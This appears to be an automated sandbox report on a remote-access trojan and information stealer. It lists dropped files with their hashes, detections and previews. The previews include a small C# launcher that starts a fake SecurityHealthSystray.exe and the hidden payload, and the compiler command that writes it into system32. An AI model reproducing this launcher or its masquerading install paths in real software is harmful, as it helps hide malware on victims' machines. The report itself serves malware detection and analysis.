                                                    SHA1:8E40BDCDF5092E0AFEA38110D5F7D4DB60C45548
                                                    SHA-256:916768DC2A2389D20B0216B9FA62C953860EAAEE368F529B820AC009F11018B1
                                                    SHA-512:D73461D3311CCED4D99042A0130BC603E75AB97F8DF413AEB62B4E003691272D15A0293B6C356E72787232FAEBBBCB1C1A6487D68FF6DA48F65228F1938059FA
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 66%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Oef................................. ........@.. .......................@............@.................................@...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B................p.......H.......D...l............................................................0..........(.... ........8........E........=...........8....(.... ........8....*(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8........0..'....... ........8........E....).......9...........b.......8$...8.... ....~....{h...:....& ....8.......... ....8....~....9.... ....~....{....9....& ....8}.......~....(f...~....(j... ....<.... ....~....{....9G...& ....8<...r...ps....z*~....(^... ...

                                                    C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe:Zone.Identifier

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                    C:\Program Files (x86)\Microsoft\Edge\Application\CSCFABAA3A3EFF44E7388BEDB3353C25726.TMP

                                                    Download File
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:MSVC .res
                                                    Category:dropped
                                                    Size (bytes):1168
                                                    Entropy (8bit):4.448520842480604
                                                    Encrypted:false
                                                    SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                    MD5:B5189FB271BE514BEC128E0D0809C04E
                                                    SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                    SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                    SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                    Malicious:false
                                                    Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

                                                    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                    Download File
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):4608
                                                    Entropy (8bit):3.9114540830942968
                                                    Encrypted:false
                                                    SSDEEP:48:6cmJtjuxZ8RxeOAkFJOcV4MKe28didfcvqBHzuulB+hnqXSfbNtm:K9xvxVx9HvklTkZzNt
                                                    MD5:D7CC891D5703DFBA8A76426FF461D1B0
                                                    SHA1:1661ECFDFC61A5865C652C84BFA4BC806F3CAAF5
                                                    SHA-256:32A5B143360B3C19B6AB1C8691ACD10909C45613F016E11720E0ED7FC90FF2C2
                                                    SHA-512:1A4803D83AB4CC387D2275CCACFE981A07513510F5D2B3CD4A63749D2EC93DD8247A93545C253A87FD8D951681A6D4ADA63513FEE812546BEFB6451593FCDAB4
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.............................'... ...@....@.. ....................................@.................................X'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..0.............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                    C:\Program Files (x86)\Windows Media Player\GrVEPTmsoNTbY.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1959424
                                                    Entropy (8bit):7.551297019501714
                                                    Encrypted:false
                                                    SSDEEP:24576:R5lX/OM3jOARx0qN+gBltRl3U3v5PjDYPgCEyKvJs9lHuqkZpEJbTzEC3HtBntip:RTHbfh2jtCEyKBs/HzkeEgntiO
                                                    MD5:1B7D99034E439D9F034C9969F88F7B74
                                                    SHA1:8E40BDCDF5092E0AFEA38110D5F7D4DB60C45548
                                                    SHA-256:916768DC2A2389D20B0216B9FA62C953860EAAEE368F529B820AC009F11018B1
                                                    SHA-512:D73461D3311CCED4D99042A0130BC603E75AB97F8DF413AEB62B4E003691272D15A0293B6C356E72787232FAEBBBCB1C1A6487D68FF6DA48F65228F1938059FA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 66%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Oef................................. ........@.. .......................@............@.................................@...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B................p.......H.......D...l............................................................0..........(.... ........8........E........=...........8....(.... ........8....*(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8........0..'....... ........8........E....).......9...........b.......8$...8.... ....~....{h...:....& ....8.......... ....8....~....9.... ....~....{....9....& ....8}.......~....(f...~....(j... ....<.... ....~....{....9G...& ....8<...r...ps....z*~....(^... ...

                                                    C:\Program Files (x86)\Windows Media Player\GrVEPTmsoNTbY.exe:Zone.Identifier

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:false
                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                    C:\Program Files (x86)\Windows Media Player\b4601131bf8590

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):245
                                                    Entropy (8bit):5.802058177170569
                                                    Encrypted:false
                                                    SSDEEP:6:1BNT3tHoGwvJtktro/ORYLWI4PtCUQcJItxW5mMizwln:xwRtjORYC5wceW4Mizwln
                                                    MD5:C747C899B5B1FD21DF9800EA3721F798
                                                    SHA1:378E7101B32C84B238C526BC51ED0828BA457EF1
                                                    SHA-256:C84304CD623DCA0149B104C6D880C549F87F7A4DE88F391D865E6CD41807FC74
                                                    SHA-512:0F2B4FFA52D5C390B1CD193049F16AA6AEDE34A15BE022097235AF71522A725CBA002416E9066856E25ECA6BDA09C70AF4850BF6AA0DF70F9C324633B59462FC
                                                    Malicious:false
                                                    Preview:OAxdM5dQ5ITilFaZNslkMYjRrpmprKYIBhGFMzv9LHilT7Grc6XklHC0bgvhTyjutLhD9UNY6lZEz78uj4Mvwyh3eQoqEOqXiy1HZCsHt9nAs8BeiB7Zlx75ooitqgTs5BfBF0UgLEBxKgKgOJICQQvu06dve9aMp5FqcAYrrbOhwKuHdBehXRboQvKJWiBLnyHPbdEOuaVzCO8pLWScf3zYeaaqzPVJZC37Cfp97Qw65mmBwf7AP

                                                    C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1959424
                                                    Entropy (8bit):7.551297019501714
                                                    Encrypted:false
                                                    SSDEEP:24576:R5lX/OM3jOARx0qN+gBltRl3U3v5PjDYPgCEyKvJs9lHuqkZpEJbTzEC3HtBntip:RTHbfh2jtCEyKBs/HzkeEgntiO
                                                    MD5:1B7D99034E439D9F034C9969F88F7B74
                                                    SHA1:8E40BDCDF5092E0AFEA38110D5F7D4DB60C45548
                                                    SHA-256:916768DC2A2389D20B0216B9FA62C953860EAAEE368F529B820AC009F11018B1
                                                    SHA-512:D73461D3311CCED4D99042A0130BC603E75AB97F8DF413AEB62B4E003691272D15A0293B6C356E72787232FAEBBBCB1C1A6487D68FF6DA48F65228F1938059FA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 66%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Oef................................. ........@.. .......................@............@.................................@...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B................p.......H.......D...l............................................................0..........(.... ........8........E........=...........8....(.... ........8....*(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8........0..'....... ........8........E....).......9...........b.......8$...8.... ....~....{h...:....& ....8.......... ....8....~....9.... ....~....{....9....& ....8}.......~....(f...~....(j... ....<.... ....~....{....9G...& ....8<...r...ps....z*~....(^... ...

                                                    C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe:Zone.Identifier

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:false
                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                    C:\Program Files\Windows Portable Devices\b4601131bf8590

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:ASCII text, with very long lines (390), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):390
                                                    Entropy (8bit):5.836396234071712
                                                    Encrypted:false
                                                    SSDEEP:6:Pkn1OnEShx90orGo5SioTbk9rmcQ8UdxFAYRrM7En9uyghHBb1kWHi/DZ:F77VxSJTb4rmcQx9uXbS1rZ
                                                    MD5:6EF3DEED3FF571D08621CBAE72D3A92D
                                                    SHA1:5EC540EF96667CF093663514FC887B199E93B51B
                                                    SHA-256:009ED7D9DB3B210E64990171CE64C8156354AAB5C853CCD47DBB67D4BD404AAE
                                                    SHA-512:184B39310392680AB50B2176DC411A0CF7BA5250C8D5A605F21BB56459158995CF3AE3D0A2761D36BB38E55FC26C678D94DD2F3FDF68B8B630656FA44B20C4FE
                                                    Malicious:false
                                                    Preview:1VQABfpMCv5EqkMBHDp5nWEUiFFxz20QY1emuPji4CsX0eo9y54PJlufQ5b5a2XJ5ppzGkQ1dGAlordEaG948kGwH9VyynICpicLyz2OoCvDkI1jcWfT3cLUi3sHOcD0786FPRQlOvP6yDL8IwWbHzIMXHn5Gu9M85FlMvUKG4FINOfert9cFlsI0urHoUedvD737jwWcLVNtA9JlINXuhGWN7vbEMgvalWJQmhH7n93QeYzvigfHHtO7lqAxUSQpjxHoz29lFZGhMGsi6qfqAoS2IMp5hUnVtNrrQK5pg4Brmque7b1nwjp4ePgnNDEvwvy9YBRvu0JFnlQbcK7Fc9jJiwMBoScd0P502uG6JF26akR38EKCF8SwMoblyQGcXqPXp

                                                    C:\Users\user\9e8d7a4ca61bd9

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:ASCII text, with very long lines (943), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):943
                                                    Entropy (8bit):5.910134597980162
                                                    Encrypted:false
                                                    SSDEEP:24:b/xMzUjm+m/qM9i97GU0l8eRVTAdKp347K9eHsUn:b/xHm+mzQ1GUTeRVTAjK9+n
                                                    MD5:23AEB76AD87E6CC58DE0E9E7B8DEACB1
                                                    SHA1:2A5FAE50B55DE5D4C232CBFAC4F1B430E04D1BCA
                                                    SHA-256:98861D786E810EDBA50D7E03C2B8350320C973A8A600564EAE58B0877910D2E4
                                                    SHA-512:0516E131EE7286EC288B37A90229E3287C7C559B7FB5B5A65290BA2B3A52739243E3D4D01A075A0DA76A5D49A09CE1948B78DB5C5EFB3D2BB24D7955EF222D0E
                                                    Malicious:false
                                                    Preview:XGnt7fSDkHZX26IoNTeI38aiuV4Ojfd8EB5qi5dGfMgU7SWaguVXj3DYpE9mkEeEobT0BcFS0YmqbFkb8dryKFYL8gAe60fascqg9gZEpChLQW6jeioGXq4iCH1eblW92L79ZEbbEmJHiN4ljaAYLYDChId2o4nDqhSFY7KZGNCugxAyMP4Al8yeH5cRliwK9FbB5zMmQkR8WSftHopZ9mbrty7de3yha1vbW93XCSuArzHzZsJ63XKWotRG1tHXwthegEXIuRWr2aA3qIDwt1oDrZxmrxfTKXO7RnSVUAMlAcdNtYatpVn5FexHRvb7vChfMClDzsbtpCCO5j3SWvnytT2xzLEijO0848AqwX3734PCciLr2Jk9Zsv3KyNoo2KbMET7iNf92q4zDzUR9WqZn0iMNHg8JPTBuy0XOOJpnlHty5zUd5pRLuxWfHuaqhzmW3FP97CvNBwCszXRSLeNjBzABe2Hds8FvfW40kVg33EK7voqtcIfDmCUEFNeE5RfDrQNcdbr07Uq7oCP0LXAjdCJcCzuW0b8ljGQeaOQBboFRWXZC8o3iQ5kpHvanqUAfWEYiwvZ7G9Iy61FpasYMiZVnglXpxmUGoj5S91PMO5bRxvsPpuN86y66tuBLXtJeoBKX6wqicL7n8D0u2I9DZVK0m8jOzEzev7mvlVT3Eogu0T8p3RSPuGET1Uu7MbtXWc2AaEJhzG8uyZ9TA4Vivjuo2T4RlVqn5JYYb7OyIvanIUebUb6SFLmwrNIHK26dZUypBk2DpgZ9JHghzc6KYXhuglrNzHnQz7Oygyaui3njvmnkrkSs5wECwEJZ3oNi2JKM3sBACMlfu8938HgOy5UD2LBbpA04pFqlcar9iRqtLjRyEPbwI8t7zGTrqjVBVqzpRXbhZgqhPk2T3NXZiEvqVtwVG9S85oYeumgrx3

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\4ra1Fo2Zql.exe.log

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1396
                                                    Entropy (8bit):5.350961817021757
                                                    Encrypted:false
                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                    MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                    SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                    SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                    SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                    Malicious:true
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\GrVEPTmsoNTbY.exe.log

                                                    Download File
                                                    Process:C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1830
                                                    Entropy (8bit):5.3661116947161815
                                                    Encrypted:false
                                                    SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4v1qHGIs0HKD:iqbYqGSI6oPtzHeqKktJtpaqZ4vwmj0K
                                                    MD5:C2E0F17D6A14A9837FE55EE183305037
                                                    SHA1:EB56F87DAE280A52D91E88872777FDEEB2E1DF76
                                                    SHA-256:8D444C9F4CB992629221443E699471F7D71BA2F0FFFC1F9BEBBA9D2F18371D47
                                                    SHA-512:F4C96FF497F0AF4756F6A65350B2F9CF3AE54CEF07E38FDF31AC653765F731256D2625E287C6AC3471A87297CC51EF4D37E857C7F51D4735681B20F0B376D855
                                                    Malicious:false
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicK

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log

                                                    Download File
                                                    Process:C:\Users\user\RuntimeBroker.exe
                                                    File Type:CSV text
                                                    Category:dropped
                                                    Size (bytes):847
                                                    Entropy (8bit):5.354334472896228
                                                    Encrypted:false
                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                    Malicious:false
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\csrss.exe.log

                                                    Download File
                                                    Process:C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe
                                                    File Type:CSV text
                                                    Category:dropped
                                                    Size (bytes):847
                                                    Entropy (8bit):5.354334472896228
                                                    Encrypted:false
                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                    Malicious:false
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                    C:\Users\user\AppData\Local\Temp\00tp5zly\00tp5zly.0.cs

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                    Category:dropped
                                                    Size (bytes):394
                                                    Entropy (8bit):4.98237441051555
                                                    Encrypted:false
                                                    SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6LCcIiFkD:JNVQIbSfhV7TiFkMSfhWLCclFkD
                                                    MD5:BD8118899AE0A6FD8FA9EBA6802A4B3D
                                                    SHA1:E27F7B7A246CCA9E739D776D1EE528839FF86767
                                                    SHA-256:75FB7FABEF1BDF7825FCC492AB43B0C2CB8DEBFA02DEC357CCBAE378555F77B9
                                                    SHA-512:9AA66381E4D59BAC0FE29897EA128A164BB268EA8C5A46748CEB676C063684FB7719A7C41FA0D42AFD8084916FFC947A40087DF6F439988A0650A2208186BA1B
                                                    Malicious:false
                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe"); } catch { } }).Start();. }.}.

                                                    C:\Users\user\AppData\Local\Temp\00tp5zly\00tp5zly.cmdline

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):251
                                                    Entropy (8bit):5.060298207677216
                                                    Encrypted:false
                                                    SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8o923fF6i/z:Hu7L//TRq79cQyN
                                                    MD5:22E63CFDB7A4CE581E47310CEF928C38
                                                    SHA1:4A6CC0FE7FCB4C05003746BD895AF73BDE743FF3
                                                    SHA-256:A5BECAF02B8AD11C171D0A2C7400AB7F0FA478113C3CAC4800DB66433588CE8B
                                                    SHA-512:DB3A50498D3FC2AAB3D52F18C79B40218539AEEB4924B55F3F2D127C36C6C68D52D0253E1427EAD5D1BC73617C6DE1069E148FBA2EC87B1881EF8BEEC4E0360E
                                                    Malicious:false
                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\00tp5zly\00tp5zly.0.cs"

                                                    C:\Users\user\AppData\Local\Temp\00tp5zly\00tp5zly.out

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (331), with CRLF, CR line terminators
                                                    Category:modified
                                                    Size (bytes):752
                                                    Entropy (8bit):5.249182494954674
                                                    Encrypted:false
                                                    SSDEEP:12:KMi/I/u7L//TRq79cQyIKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KMoI/un/Vq79tyIKax5DqBVKVrdFAMBt
                                                    MD5:95909131F50D8D08445134092D6725B6
                                                    SHA1:0103E3705D8741C100286D4066A832987903018C
                                                    SHA-256:5F89CF5F944F2167FA1A990B022F1766E9CDF9366CF91C49261301EC6F54D6CE
                                                    SHA-512:C25F8C52633A8828D893824A810A106A50AC972D800D5B53F580438A1E9D694639FDA10D55E23EB2535D27CC223C4BCF842A6E04A0E7078F551B6989A587AD74
                                                    Malicious:false
                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\00tp5zly\00tp5zly.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                    C:\Users\user\AppData\Local\Temp\IZdub348jc.bat

                                                    Download File
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
